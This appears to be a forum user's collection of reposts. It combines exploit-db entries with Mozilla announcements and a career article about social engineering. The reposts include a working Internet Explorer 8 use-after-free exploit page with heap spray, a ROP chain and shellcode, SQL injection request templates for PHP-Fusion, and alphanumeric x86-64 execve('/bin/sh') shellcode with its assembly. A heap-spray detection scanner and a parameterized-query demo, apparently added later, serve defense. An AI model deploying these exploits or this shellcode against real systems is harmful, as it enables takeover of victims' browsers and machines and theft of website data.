Everything posted by Nytro
-
[h=1]Internet Explorer 8 MS14-035 Use-After-Free Exploit[/h]
[CODE]
<!--
Exploit Title: MS14-035 Use-after-free Exploit for IE8
Date: 10 Nov 2014
Exploit Author: Ayman Sagy <aymansagy@gmail.com>
https://www.linkedin.com/in/aymansagy
Tested on: IE8 with Java6 on Windows7
-->
<html>
<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>
<body>
<!--
<APPLET id="dummy" code="dummy.class" width=100 height=100>
You need to install Java to view this page.
</APPLET>
-->
<div id="mydiv">x</div>
<form id="frm"></form>
<div id="sprayfrm"></div>
<script type="text/javascript">
spraysize = 5000;
sprayelement = document.getElementById("sprayfrm");
sprayelement.style.cssText = "display:none";
var data;
offset = 0x506;
buffer = unescape("%u2020%u2020");
pivot = unescape("%u8b05%u7c34"); // stack pivot

// MSVCR71
rop = unescape("%u4cc1%u7c34");        // pop eax;ret;
rop += unescape("%u10c2%u7c34");       // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34");       // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38");       // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36");       // pop esi;ret;
rop += unescape("%u5243%u7c34");       // ret;
rop += unescape("%u8f46%u7c34");       // pop ebp;ret;
rop += unescape("%u87ec%u7c34");       // call eax;
rop += unescape("%u4cc1%u7c34");       // pop eax;ret;
rop += unescape("%ufdff%uffff");       // {size}
rop += unescape("%ud749%u7c34");       // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34");       // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34");       // pop edx;ret;
rop += unescape("%uffc0%uffff");       // {flag}
rop += unescape("%u1eb1%u7c35");       // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35");       // pop edi;ret;
rop += unescape("%u30ea%u7c35");       // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34");       // pop eax;ret;
rop += unescape("%ua181%u7c37");       // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35");       // sub eax,30;ret;
rop += unescape("%u8c81%u7c37");       // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36");       // push esp;ret;
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010

// calc
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163");

/*
   _______0x1cc_____
  |                 |
 \|/                |
 Junk ROP Shellcode Pivot Junk
  2                 3     1
*/
while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
buffer += rop;
buffer += shellcode;
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
while (buffer.length < 0x1000) buffer += buffer;

data = buffer.substring(0,offset) + pivot + rop + shellcode
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
while (data.length < 0x80000) data += data;

for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
{
    var obj = document.createElement("button");
    obj.title = data.substring(0,0x40000-0x58);
    //obj.style.fontFamily = data.substring(0,0x40000-0x58);
    sprayelement.appendChild(obj);
}

block = unescape( // Literal string to avoid heap allocation
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");

blocks = new Array();
for (i = 0; i < spraysize; i++) { // spray 1
    blocks.push(document.createElement("button"));
    blocks[i].setAttribute("title",block.substring(0, block.length));
    sprayelement.appendChild(blocks[i]);
}
for (i = spraysize/2; i < spraysize; i++) { // free some blocks
    blocks[i].setAttribute("title","");
}

var newdiv = document.createElement('div');
newdiv.innerHTML = "<textarea id='CTextArea'></textarea>";
document.getElementById("frm").appendChild(newdiv);
var newdiv2 = document.createElement('div');
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
document.getElementById("frm").appendChild(newdiv2);
document.getElementById("CInput").checked = true;
trigger = true;
document.getElementById("frm").reset();

function crash() {
    if (trigger) {
        document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
        CollectGarbage();
        for (i = spraysize/2; i < spraysize; i++) { // spray 2
            blocks[i].setAttribute("title",block.substring(0, block.length));
        }
    }
}
</script>
</body>
</html>
[/CODE]
Source: http://www.exploit-db.com/exploits/35213/
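From the detection side, the page above shows the shape a browser use-after-free exploit of this generation takes: long %uXXXX unescape() literals, a %u9090 NOP sled, element-creation loops with large bounds, and an innerHTML wipe followed by CollectGarbage() to get the freed object reclaimed. The following Python scanner, an added example that is not part of the exploit-db entry or this post, scores a page on exactly those indicators. The two sample pages embedded at the bottom are constructed for the demonstration (placeholder bytes, no working payload) and the thresholds are assumptions to tune per environment.

```python
import re
from typing import Dict, List

# Indicators drawn from the exploit above: %uXXXX unescape() literals,
# a %u9090 NOP sled, createElement loops with big bounds, and an
# innerHTML wipe followed by CollectGarbage().
UNICODE_TOKEN_RE = re.compile(r"%u[0-9a-fA-F]{4}")
STRING_LITERAL_RE = re.compile(r'"((?:%u[0-9a-fA-F]{4})+)"')
NOP_SLED_RE = re.compile(r"(?:%u9090){4,}", re.IGNORECASE)
ASSIGN_RE = re.compile(r"\b(\w+)\s*=\s*(0x[0-9a-fA-F]+|\d+)\s*;")
NUM_RE = re.compile(r"0x[0-9a-fA-F]+|\d+")
LOOP_RE = re.compile(
    r"for\s*\([^;]*;\s*\w+\s*<\s*(\w+)\s*;[^)]*\)\s*(?://[^\n]*\n)?\s*\{"
    r"(?:[^{}]|\{[^{}]*\})*?createElement",
    re.DOTALL,
)
GC_RE = re.compile(r"\bCollectGarbage\s*\(")
WIPE_RE = re.compile(r"\.innerHTML\s*=\s*(?:\"\"|'')")


def _to_int(text: str) -> int:
    return int(text, 16) if text.lower().startswith("0x") else int(text, 10)


def _resolve(bound: str, consts: Dict[str, int]) -> int:
    # A loop bound is a numeric literal or a name assigned a literal earlier.
    return _to_int(bound) if NUM_RE.fullmatch(bound) else consts.get(bound, 0)


def scan_html(html: str, token_threshold: int = 16, loop_threshold: int = 256) -> Dict[str, object]:
    """Return the heap-spray / UAF-trigger indicators found in a page (thresholds are assumptions)."""
    consts = {name: _to_int(val) for name, val in ASSIGN_RE.findall(html)}
    findings: List[str] = []

    tokens = len(UNICODE_TOKEN_RE.findall(html))
    longest = max((len(s) // 6 for s in STRING_LITERAL_RE.findall(html)), default=0)
    if tokens >= token_threshold:
        findings.append(f"{tokens} %uXXXX tokens (longest literal: {longest} words)")
    if NOP_SLED_RE.search(html):
        findings.append("NOP sled (%u9090 run) inside an unescape() literal")
    big = [b for b in (_resolve(n, consts) for n in LOOP_RE.findall(html)) if b >= loop_threshold]
    if big:
        findings.append(f"createElement loop(s) with bound(s) {big}")
    if GC_RE.search(html) and WIPE_RE.search(html):
        findings.append("innerHTML wipe plus CollectGarbage() (free-then-reclaim pattern)")

    return {"findings": findings, "score": len(findings), "suspicious": len(findings) >= 2}


# Constructed sample pages (not from the exploit above): one mirroring its
# structure with placeholder bytes, and one ordinary DOM-manipulating page.
SUSPICIOUS_PAGE = """<script>
spraysize = 4096;
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
blocks = new Array();
for (i = 0; i < spraysize; i++) { // spray
  blocks.push(document.createElement("button"));
  blocks[i].setAttribute("title", shellcode);
}
function crash() {
  document.getElementById("frm").innerHTML = "";
  CollectGarbage();
}
</script>"""

BENIGN_PAGE = """<script>
var items = ["a", "b", "c"];
for (i = 0; i < items.length; i++) { list.appendChild(document.createElement("li")); }
document.getElementById("status").innerHTML = "";
</script>"""

if __name__ == "__main__":
    print(scan_html(SUSPICIOUS_PAGE))   # score 4, suspicious True
    print(scan_html(BENIGN_PAGE))       # score 0, suspicious False
```

Each indicator on its own is weak (a benign page may clear innerHTML, a minifier may emit %u escapes), which is why the verdict needs two or more of them together; the loop-bound resolution exists because sprays almost always size themselves through a variable like spraysize rather than a literal.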
-
[h=1]PHP-Fusion 7.02.07 - SQL Injection[/h]
[CODE]
# Exploit Title: PHP-Fusion 7.02.07 SQL Injection
# Date: 06/11/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.php-fusion.co.uk
# Software Link: http://ufpr.dl.sourceforge.net/project/php-fusion/PHP-Fusion%20Archives/7.x/PHP-Fusion-7.02.07.zip
# Version: 7.02.07
# Tested on: Linux OS (Debian)
# CVE : CVE-2014-8596

GET /PHP-Fusion/files/administration/submissions.php?action=2&aid=9b23a9871adc75cd&submit_id=1[SQL Injection]&t=n HTTP/1.1
Host: 192.168.0.105
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9; fusion68fF5_visited=yes; has_js=1;
Connection: keep-alive

and

GET /PHP-Fusion/files/administration/members.php?aid=9b23a9871adc75cd&status=4[SQL Injection] HTTP/1.1
Host: 192.168.0.105
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;; fusion68fF5_visited=yes; has_js=1;
Connection: keep-alive
[/CODE]
More information (in Brazilian Portuguese): https://www.xlabs.com.br/blog/?p=282
Source: http://www.exploit-db.com/exploits/35206/
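The two requests above inject through integer-looking parameters (submit_id, status) that reach the query as text. The following Python example, added here and not taken from PHP-Fusion or the advisory, shows the general defect and its fix against an in-memory SQLite table: the vulnerable lookup concatenates the parameter into the SQL, the hardened one validates the type and binds it. The table, its column names and the sample rows are constructed for the demonstration; the PHP equivalent of the fix is casting with intval() or binding through a prepared statement.

```python
import sqlite3
from typing import List, Tuple


def build_demo_db() -> sqlite3.Connection:
    # Constructed sample table standing in for the submissions table that
    # submissions.php queries; column names are assumptions.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE submissions (submit_id INTEGER, submit_user TEXT, submit_title TEXT)")
    conn.executemany(
        "INSERT INTO submissions VALUES (?, ?, ?)",
        [(1, "alice", "first"), (2, "bob", "second"), (3, "carol", "third")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, submit_id: str) -> List[Tuple[int, str]]:
    # The request parameter is pasted into the SQL text, so a value such as
    # "1 OR 1=1" changes the query's logic instead of being compared as data.
    sql = "SELECT submit_id, submit_user FROM submissions WHERE submit_id=" + submit_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, submit_id: str) -> List[Tuple[int, str]]:
    # Validate the type, then bind: the database receives the query shape and
    # the value separately, so the value can never become SQL.
    if not submit_id.isdigit():
        raise ValueError("submit_id must be a non-negative integer")
    sql = "SELECT submit_id, submit_user FROM submissions WHERE submit_id=?"
    return conn.execute(sql, (int(submit_id),)).fetchall()


def compare(submit_id: str) -> dict:
    """Run the same parameter value through both versions and report row counts."""
    conn = build_demo_db()
    result = {"vulnerable_rows": len(lookup_vulnerable(conn, submit_id))}
    try:
        result["safe_rows"] = len(lookup_safe(conn, submit_id))
    except ValueError as err:
        result["safe_rows"] = str(err)
    return result


if __name__ == "__main__":
    print(compare("1"))          # both versions return one row
    print(compare("1 OR 1=1"))   # vulnerable version returns every row; safe version rejects the value
```

The type check before binding is deliberate: binding alone stops the injection, but rejecting non-numeric input also gives the application a clean place to log the attempt, which is the signal a WAF or SIEM rule for this CVE would key on.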
-
[h=1]Introducing Polaris Privacy Initiative to Accelerate User-focused Privacy Online[/h]
Denelle Dixon-Thayer

At Mozilla, we believe that an individual’s privacy on the Internet cannot be treated as optional. Our Privacy Principles guide us with the design of each of our products and services. We’ve introduced features to support our privacy focus across desktop and mobile, including: an add-on platform with Firefox Add-ons like LightBeam, Ghostery and Privacy Badger; the Do Not Track preference; Private and Guest Browsing; high levels of encryption with Firefox Sync; an individual approach to apps permissions; and even a new Forget button. But we recognize we need to do better and do more. We want to give our users the Web experience they want through features that create transparency and control. We want our users to trust us and the Web.

In October 2014, Harris Poll conducted a global online survey* on behalf of Mozilla of more than 7,000 online adults ages 18-64. Three quarters (74%) of people feel their personal information on the Web is less private today than it was one year ago. That same figure of adults agree that Internet companies know too much about them. We think we can help with this concern.

Today, we are excited to announce a new strategic initiative at Mozilla called Polaris. Polaris is a privacy initiative built to pull together our own privacy efforts along with other privacy leaders in the industry. Polaris is designed to allow us to collaborate more effectively, more explicitly and more directly to bring more privacy features into our products. We want to accelerate pragmatic and user-focused advances in privacy technology for the Web, giving users more control, awareness and protection in their Web experiences. We want to advance the state of the art in privacy features, with a specific focus on bringing them to more mainstream audiences.

We’re joined at launch by the Center for Democracy & Technology (CDT) and the Tor Project, both non-profits, who will support and advise Polaris projects and help us align them with policy goals. We believe that the support and assistance from each of these groups is crucial. “CDT looks forward to working with Mozilla on the Polaris program and advising on issues like combating Internet censorship and protecting online anonymity, which are vital to promoting free expression online,” said Justin Brookman of CDT. Not only will these collaborations hold us accountable to staying true to our goal of getting new and innovative privacy features into our general release products, the diversity of understanding, focus and opinion will improve what we bring to the mainstream.

Today we’re announcing two experiments under the Polaris banner, focused on anti-censorship technology, anonymity, and cross-site tracking protection.

First, Mozilla engineers are evaluating the Tor Project’s changes to Firefox, to determine if changes to our own platform codebase can enable Tor to work more quickly and easily. Mozilla will also soon begin hosting our own high-capacity Tor middle relays to make Tor’s network more responsive and allow Tor to serve more users. “The Tor Project is excited to join Mozilla as a launch partner in the Polaris program. We look forward to working together on privacy technology, open standards, and future product collaborations,” said Andrew Lewman of the Tor Project.

The second experiment (which is our first in-product Polaris experiment) seeks to understand how we can offer a feature that protects those users that want to be free from invasive tracking without penalizing advertisers and content sites that respect a user’s preferences. We’re currently testing this privacy tool in our “Nightly” channel. The experiment is promising, but it’s not a full-fledged feature yet. We’ll test and refine the user experience and platform behavior over the coming months and collect feedback from all sides before this is added to our general release versions.

We recognize that privacy is not just a functionality on your computer or a setting you can turn on or off, and we’re excited to see what we can do to advance privacy online with Polaris. To learn more or to join us, visit the wiki.

*Survey Methodology
This survey was conducted online within Great Britain, France, Spain, Germany, Brazil, and India between October 22nd and 29th, 2014 among 7,077 adults (aged 18-64) by Harris Poll on behalf of Mozilla via its Global Omnibus product. Figures for age, sex, race/ethnicity, education, region and household income were weighted where necessary to bring them into line with their actual proportions in the population. Where appropriate, these data were also weighted to reflect the composition of the adult online population. For complete survey methodology, including weighting variables, please contact press@mozilla.com

Source: https://blog.mozilla.org/privacy/2014/11/10/introducing-polaris-privacy-initiative-to-accelerate-user-focused-privacy-online/
-
How To Become a Social Engineer
November 10, 2014

I really must admit that one of the most asked questions we get through the website is something like, “I really want to get into social engineering as a career, what should I read/take in college to give me the best chance?” then followed up by “How do I get into this as a job/career?” It is a serious question that we have spent considerable time trying to come up with an appropriate answer for. This month I will answer the education piece, by telling you my own thoughts, what I look for when I hire and also what some of my most trusted friends from large companies look for when hiring. Then next month, I will go into how to make this your career.

So you wanna be a social engineer?

I understand why the question comes in so often. This job is pretty cool sounding. We get paid to phish, vish and break into companies every day. That certainly sounds like the dream job – well at least for a lot of us. Like most careers, it is logical to think that there may be a clear path to education to help you with a leg up in this field. Some people ask me if they should study psychology, if they should get sales experience; others wonder if they should skip school altogether. What’s the answer?

Let’s first ask my good friend Jim. He manages a large team of pentesters that includes red teams, social engineers and some excellent hackers at one of the world’s largest financial institutions. I asked him this question, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?”

Jim says, “First of all I look for experience. But there are certifications that mean something to me like Offensive Security’s certifications (OSCP / OSCE) and the CISSP. In addition, my mantra is generally: Jack-of-all-trades, master of a couple. I look for folks who have a fairly broad generalist experience, but have taken an interest in deeply diving into one or two. I also look for mentality; can the candidate think like a bad guy? Is security your job, or a passion? What does your home network look like? And very importantly, does the candidate have the ability to communicate clearly, concisely, and professionally? Finally, personal references are good, especially when it comes to character, since if you join my team you’re going to have to be a highly trusted individual.”

Thanks Jim, that was very helpful. I went to another very close friend who has been in the industry for a very long time, helping run Black Hat and now running the Global Education and Training practice at Accuvant, Ping Look. Jim, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?”

Ping said, “Accuvant does not look for degrees – experience and ability to pass the practical exams that we administer and references, especially industry ones, are more important. I know that most hackers’ goals aren’t to be promoted to management but the reality is that everyone has to make a living and having more responsibility within a company usually means a promotion whether it be to management or not. I do know from anecdotal experience of others that at a lot of larger firms, not having a college degree will make it more difficult to be promoted (initially) to management positions. HOWEVER in a technical field, smart companies know that InfoSec is still an emerging marketplace and that finding a candidate with a college degree, especially in computer science, who is also a good infosec practitioner with the necessary experience will be very difficult. Over time, those who prove themselves technically adept and have good management chops end up having the same chance in getting promotions or running teams or being lead technologist or chief research scientist as the guy with a degree.”

Another excellent answer that really helps us get a clear picture. Finally, I went to my good friend, Dave Kennedy. Dave started his own company just a few years ago, Trusted Sec, and went from just a couple people to over 20 people. He obviously knows a thing or two about hiring pentesters. So I presented him with the same question, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?”

Dave said, “I favor experience over education any day. Although a college degree is important, I am looking for someone who has the experience to handle the type of work that we get. References are important, but I tend to hire people I’ve known and trust in the industry so I always get individuals I know and trust to do the work.”

All three answers really paint a great picture for anyone thinking and asking.

What about Social-Engineer, Inc?

My company has personally grown over the last couple years so I have had to spend considerable time thinking about what it is that I need in employees. Unlike some of the great minds I asked above, my needs are a tad bit different. But let me pick out the similarities from what we saw above:
[LIST]
[*]Experience always wins. Many of my team have degrees, and some, like Michele, are not only highly educated but trained educators. Even with that, experience is king. Now with that said there aren’t just slews of people that have tons of experience in phishing, vishing and breaking into buildings without having a criminal record. I will discuss later how we get around this particular hurdle in a bit.
[*]Mentality: This is a big one because there are many components to this particular topic.
[LIST]
[*]Can the person think like a bad guy? We have a motto in my company, “Always leave them feeling better for having met you.” We apply that to how we want our customers to feel about our services. So although I need my people to be able to THINK like a bad guy, I need them to care enough about the customer that they don’t revel in the bad side too long.
[*]Desire to learn. We are in a constant state of growth, and part of that is learning how to adapt when the times, attack vectors and methods of the bad guys change. My team has to be willing to do that.
[*]Learn from failure. I have failed so many times I can’t count them, but the important part is learning from each failure. My team has to be willing to have the same attitude.
[*]Is this a hobby or a passion? It is important to me to find people who enjoy the work and don’t just look at it as a “job”.
[/LIST]
[*]Performance based education. Right now from what I found, Social-Engineer has the only performance based SE Certification around. I also favor the Offensive Security Certifications as they prove fortitude, persistence and critical thinking skills.
[*]Critical thinkers. Probably one of the most important aspects of being a social engineer is being able to critically think. To adapt, flex and change your methods on the fly. To be able to think outside the box, as if there is no box.
[*]Willingness to try new things. Many times my team will be required to try completely new things, new pretexts, new methodologies and new processes.
[/LIST]
Does this mean that education is completely useless? No, not at all. Depending on the role we are looking for, a degree can definitely add to usefulness and the position we use the person for. If you are going to college already and you are thinking of a career in pentesting and maybe even social engineering, then there are some areas of study that can help. Things like computer sciences, psychology and social psychology can all help. Of course, we think everyone who wants to be a social engineer should take our 5-day “Advanced Practical Social Engineering” course too. In the end, the fortitude to stick through college, study hard and graduate with good grades can tell a potential employer that you have some great qualities to make a good employee.

At the end of the day, social engineering is an exciting and very rewarding career path. Study hard, stay out of trouble and get practical experience where you can and it may just be your career someday too. Next month we will discuss the HOW… till then, stay safe.

- See more at: http://www.social-engineer.org/newsletter/social-engineer-newsletter-vol-05-issue-61

Source: How To Become a Social Engineer | Christopher Hadnagy | LinkedIn
-
Mozilla Introduces the First Browser Built For Developers: Firefox Developer Edition
on November 10, 2014 by Dave Camp

Developers are critical to the continued success of the Web. The content and apps they create compel us to come back to the Web every day, whether on a computer or mobile phone. In celebration of the 10th anniversary of Firefox, we’re excited to unveil Firefox Developer Edition, the first browser created specifically for developers.

Ten years ago, we built Firefox for early adopters and developers to give them more choice and control. Firefox integrated WebAPIs and Add-ons to enable people to get the most out of the Web. Now we’re giving developers the whole browser as a hard-hat area, allowing us to bring front and center the features most relevant to them. Having a dedicated developer browser means we can tailor the browsing experience to what developers do every day.

Because Firefox is part of an open-source, independent community and not part of a proprietary ecosystem, we’re able to offer features other browsers can’t by applying our tools everywhere the Web goes, regardless of platform or device.

One of the biggest pain points for developers is having to use numerous siloed development environments in order to create engaging content or for targeting different app stores. For these reasons, developers often end up having to bounce between different platforms and browsers, which decreases productivity and causes frustration.

Firefox Developer Edition solves this problem by creating a focal point to streamline your development workflow. It’s a stable developer browser which is not only a powerful authoring tool but also robust enough for everyday browsing. It also adds new features that simplify the process of building for the entire Web, whether targeting mobile or desktop across many different platforms.

If you’re an experienced developer, you’ll already be familiar with the installed tools so you can focus on developing your content or app as soon as you open the browser. There’s no need to download additional plugins or applications to debug mobile devices. If you’re a new Web developer, the streamlined workflow and the fact that everything is already set up and ready to go makes it easier to get started building sophisticated applications.

So what’s under the hood?

The first thing you’ll notice is the distinctive dark design running through the browser. We applied the developer tools theme to the entire browser. It’s trim and sharp and focused on saving space for the content on your screen. It also fits in with the darker look common among creative app development tools.

We’ve also integrated two powerful new features, Valence and WebIDE, that improve workflow and help you debug other browsers and apps directly from within Firefox Developer Edition.

Valence (previously called Firefox Tools Adapter) lets you develop and debug your app across multiple browsers and devices by connecting the Firefox dev tools to other major browser engines. Valence also extends the awesome tools we’ve built to debug Firefox OS and Firefox for Android to the other major mobile browsers including Chrome on Android and Safari on iOS. So far these tools include our Inspector, Debugger and Console and Style Editor.

WebIDE allows you to develop, deploy and debug Web apps directly in your browser, or on a Firefox OS device. It lets you create a new Firefox OS app (which is just a web app) from a template, or open up the code of an existing app. From there you can edit the app’s files. It’s one click to run the app in a simulator and one more to debug it with the developer tools.

Firefox Developer Edition also includes all the tools experienced Web developers are familiar with, including:
[LIST]
[*]Responsive Design Mode – see how your website or Web app will look on different screen sizes without changing the size of your browser window.
[*]Page Inspector – examine the HTML and CSS of any Web page and easily modify the structure and layout of a page.
[*]Web Console – see logged information associated with a Web page and use Web Console to interact with a Web page using JavaScript.
[*]JavaScript Debugger – step through JavaScript code and examine or modify its state to help track down bugs.
[*]Network Monitor – see all the network requests your browser makes, how long each request takes and details of each request.
[*]Style Editor – view and edit CSS styles associated with a Web page, create new ones and apply existing CSS stylesheets to any page.
[*]Web Audio Editor – inspect and interact with Web Audio API in real time to ensure that all audio nodes are connected in the way you expect.
[/LIST]
Give it a try and let us know what you think. We’re keen to hear your feedback.

More Information: Download Firefox Developer Edition; Release Notes

Source: https://hacks.mozilla.org/2014/11/mozilla-introduces-the-first-browser-built-for-developers-firefox-developer-edition/
-
[h=1]Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)[/h]
[CODE]
#Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
#Author: Breaking.Technology
#Date: 06 November 2014
#Vendor Homepage: http://breaking.technology
#Version: x86-64 platforms
#Classification: 64 bit shellcode
#Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt

# Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
# This shellcode will successfully execute every time as long as it is returned to.
# (c) 2014 Breaking Technology, Inc.
# http://breaking.technology/
#
# Assembled (87 bytes):
# XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o

.section .data
.section .text
.globl _start
_start:                         # "XX"
    pop %rax                    # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer
    pop %rax                    # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer

prepare_ff:                     # "j0TYX45Pk13"
    push $0x30                  # 'j0'
    push %rsp                   # 'T'
    pop %rcx                    # 'Y' %rcx points to $0x30
    pop %rax                    # 'X' %rax = 0x30
    xor $0x35, %al              # '45' %rax = 0x05
    push %rax                   # 'P' (%rcx) = 0x05
    imul $0x33, (%rcx), %esi    # 'k13' %esi = 0x000000ff

prepare_f8:                     # "VX4047"
    # mov %rsi, %rax
    push %rsi                   # 'V'
    pop %rax                    # 'X' %rax = %rsi = 0x000000ff
    # mov $0xf8, %al
    xor $0x30, %al              # '40'
    xor $0x37, %al              # '47' %rax = 0x000000f8

write_negative_8:               # "3At1At1qu1qv1qw"
    # mov %eax, 0x74(%rcx)
    xor 0x74(%rcx), %eax        # '3At'
    xor %eax, 0x74(%rcx)        # '1At' 0xf8
    # mov %sil, 0x75 - 0x77 + rcx
    xor %esi, 0x75(%rcx)        # '1qu' 0xff
    xor %esi, 0x76(%rcx)        # '1qv' 0xff
    xor %esi, 0x77(%rcx)        # '1qw' 0xff
    # -8 is now on the stack as a 32-bit dword
    # at 0x74(%rcx)

read_negative_8:                # "Hcyt"
    # move long (dword) to signed quadword
    # mov -8, %rdi
    movslq 0x74(%rcx), %rdi     # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 )

get_return_pointer:             # "14yH34y"
    # mov -0x10(%rcx), %rsi <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi
    # OR IN DECIMAL:
    # mov -16(%rcx), %rsi
    xor %esi, (%rcx, %rdi, 2)   # '14y'
    xor (%rcx, %rdi, 2), %rsi   # 'H34y'

prepare_key:                    # "hj5XVX"
    # put the xor key into %eax
    push $0x5658356a            # 'hj5XV' pushed backwards because x86 stack.
    pop %rax                    # 'X'

decode_encoded_code:            # "1FK"
    xor %eax, 0x4b(%rsi)        # '1FK' encoded_code ; pops & syscall decoded

decode_encoded_data:            # "1FSH3FO"
    xor %eax, 0x53(%rsi)        # '1FS' encoded_data + 4 ; "/sh\0" decoded
    xor 0x4f(%rsi), %rax        # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax

begin_stack_setup:              # "PT"
    push %rax                   # 'P' push "/bin/sh\0"
    push %rsp                   # 'T' push pointer to /bin/sh

zero_rax:                       # "j0X40"
    # xor %rax, %rax
    push $0x30                  # 'j0'
    pop %rax                    # 'X'
    xor $0x30, %al              # '40' %rax is NULL

end_stack_setup:                # "PP"
    push %rax                   # 'P' push NULL
    push %rax                   # 'P' push NULL

mov_3b_al:                      # "4u4N"
    # mov $0x3b, %al
    xor $0x75, %al              # '4u'
    xor $0x4e, %al              # '4N' %al = 0x4e xor 0x75 = $0x3b
    # this is for syscall ^

begin_stack_run:                # "Z"
    pop %rdx                    # 'Z' mov $0x00, %rdx ; %rdx = NULL

encoded_code:                   # "4jWS"
    # 0x34 0x6a 0x57 0x53
    # AFTER XOR MAGIC:
    .byte 0x34                  # "\x5e" pop %rsi ; %rsi = NULL
    .byte 0x6a                  # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0"
    .byte 0x57                  # "\x0f"
    .byte 0x53                  # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL);
    # syscall(%rax) = function(%rdi,%rsi,%rdx);
    # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);

encoded_data:                   # "EW18EF0V" turns into "/bin/sh\0"
    # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
    # AFTER XOR MAGIC:
    .byte 0x45                  # /
    .byte 0x57                  # b
    .byte 0x31                  # i
    .byte 0x38                  # n
    .byte 0x45                  # /
    .byte 0x46                  # s
    .byte 0x30                  # h
    .byte 0x56                  # \0
[/CODE]
Source: http://www.exploit-db.com/exploits/35205/
